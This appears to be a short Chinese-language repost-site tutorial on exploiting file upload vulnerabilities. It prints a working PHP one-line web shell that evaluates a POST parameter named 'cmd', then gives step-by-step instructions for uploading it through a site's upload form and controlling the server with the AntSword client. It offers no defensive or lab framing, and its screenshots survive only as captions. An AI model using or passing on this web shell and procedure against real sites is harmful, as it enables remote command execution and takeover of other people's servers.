当前位置：卡卷网 / 每日看点 / 正文

文件上传漏洞一般会怎么利用？

作者：卡卷网发布时间：2025-05-07 22:50浏览数量：18次评论数量：0次

准备知识：

一句话木马：<?php @eval($_POST['cmd']); ?>

木马连接工具如：AntSword（蚁剑）

首先把一句话木马写入到php文件中

文件上传漏洞一般会怎么利用？第1张

然后找到一个上传文件的地方把php文件上传上去，比如：

文件上传漏洞一般会怎么利用？第2张

上传木马后找到木马上传的位置

文件上传漏洞一般会怎么利用？第3张

编辑把这个复制粘贴到地址栏里的链接后面，如下：

文件上传漏洞一般会怎么利用？第4张

按回车

文件上传漏洞一般会怎么利用？第5张

然后复制链接，打开AntSword，点击add

文件上传漏洞一般会怎么利用？第6张

然后会弹出个框，在shell url地方粘贴刚才地址栏复制的链接，shell pwd地方输入cmd然后按add即可

文件上传漏洞一般会怎么利用？第7张

双击刚才添加的

文件上传漏洞一般会怎么利用？第8张

可以看到木马已经连接上了

文件上传漏洞一般会怎么利用？第9张

END

免责声明：本文由卡卷网编辑并发布，但不代表本站的观点和立场，只提供分享给大家。

请记住:卡卷网 Www.Kajuan.Net

卡卷网